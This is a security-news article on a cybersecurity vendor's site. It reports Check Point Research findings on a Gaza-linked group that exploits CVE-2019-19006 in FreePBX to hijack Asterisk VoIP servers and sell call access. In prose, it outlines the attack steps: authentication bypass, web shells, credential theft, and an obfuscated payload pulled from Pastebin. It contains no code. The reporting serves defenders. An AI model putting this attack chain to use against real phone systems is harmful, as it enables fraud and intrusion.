Frame-14

Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing

        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing

        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing

        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing

        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training

        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing

        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review

        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention

        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise

        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle

        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

I'VE BEEN BREACHED

Hackers Stealing And Selling VoIP Access

Hackers Stealing And Selling VoIP Access

Chart shows the first level of how an attack transpires. (Source: Check Point Research)

Attackers Exploit a Vulnerability in Asterisk VoIP PBX Servers

Check Point Research has uncovered a large and likely profitable business model that involves hackers attacking and gaining control of certain VoIP services, which enables them to make phone calls through a company’s compromised system.

During the first half of this year, Check Point researchers found the campaign operated by a hacking group that they believe is working from the Palestinian Gaza Strip. The ongoing campaign targets the open-source user interface of Sangoma PBX, which manages the Asterisk VoIP PBX system – one of the world’s largest such systems.

The threat actors exploit a critically rated vulnerability tracked as CVE-2019-19006 to gain control of companies’ VoIP phone systems to make calls.

“Gaining access to the systems allows the hackers to abuse the servers for their own purposes. CVE-2019-19006 is an authentication bypass vulnerability published in November 2019,” the researchers state in their report. “Check Point Research was able to deduce the vulnerability by examining both the captured attack traffic and Sangoma’s GitHub repository for FreePBX Framework.”

Also Read: 10 Practical Benefits of Managed IT Services

By gaining this level of access to a company’s telephone system, the group can sell phone numbers, calls plans and live access to compromised VoIP services, the report says.

“They can also use the compromised systems for further attacks, such as using the system resources for cryptomining, spreading laterally across the company network or launching attacks on outside targets while masquerading as the compromised company,” the researchers say.

VoIP attacks have recently been in the news. For example, the security firm ESET uncovered a Linux malware variant dubbed “CDRThief” targeting VoIP networks to steal phone metadata, such as IP addresses.

Dialing Up the Attack

In the campaign Check Point Research discovered, the attacks start by scanning for “session in progress” systems using the vulnerable FreePBX software to bypass the authentication step. At this point, a web shell is uploaded and the attack breaks into two parts, according to the report.

First, the initial web shell is used to retrieve the contents of Asterisk management files that contain the credentials to the FreePBX system’s database and passwords for the various SIP extensions, effectively giving full control of the entire system to the attacker. The threat actor then makes a test phone call to see if the system is, in fact, under their control, the researchers note.

Next, the web shell is used to download a base64-encoded PHP file from Pastebin that is padded with garbage comments as an obfuscation method. When the file is decoded, it creates a password-protected web shell that is capable of retrieving the credentials to the Asterisk Internal Database and REST Interface, according to Check Point.

Also Read: Limiting Location Data Exposure: 8 Best Practices

Social Media Element

In the code, the researchers found several references to Inj3ctor3 and inje3t0r3-seraj, the first of which is the name associated with a Pastebin account that contained the initial web shell upload, the report states.

These names eventually led the Check Point team to several private Facebook groups that deal with VoIP exploitation and “session in progress” server exploitation.

“The group shares a number of tools related to SIP server exploitation: scanners, authentication bypass and remote code execution scripts. Among these scripts, we found a variant of the brute-force script seen in the Pastebin of INJ3CTOR3,” Check Point says.

The Facebook posts contained information that opened several additional avenues for the researchers to explore, leading them to the conclusion that this style of attack is common, particularly in the Middle East.

“Closely examining the profiles of the admins, active users, and carriers seen in the different groups, we found that most of them were from Gaza, the West Bank and Egypt,” the researchers say.

Senior Correspondent Chinmay Rautmare contributed to this report.

0 Comments

Let us help you out.

Grab your free consultation NOW!

Privacy Ninja

Data Protection​

Cybersecurity

Support

Company

Locations

Singapore

7 Temasek Boulevard
#12-07, Suntec Tower One
Singapore 038987

Thailand

The Royal Place 1
2, 2/399 Mahatlek Luang 1 Alley, Lumphini, Pathum Wan, Bangkok 10330, Thailand



email-icon
Facebook Twitter Linkedin Youtube

KEEP IN TOUCH

Subscribe to our mailing list to get free tips on Data Protection and Data Privacy updates weekly!

Personal Data Protection

REPORTING DATA BREACH TO PDPC?

We have assisted numerous companies to prepare proper and accurate reports to PDPC to minimise financial penalties.
TALK TO US
×

Hello!

Click one of our contacts below to chat on WhatsApp

Social Chat is free, download and try it now here!

× Chat with us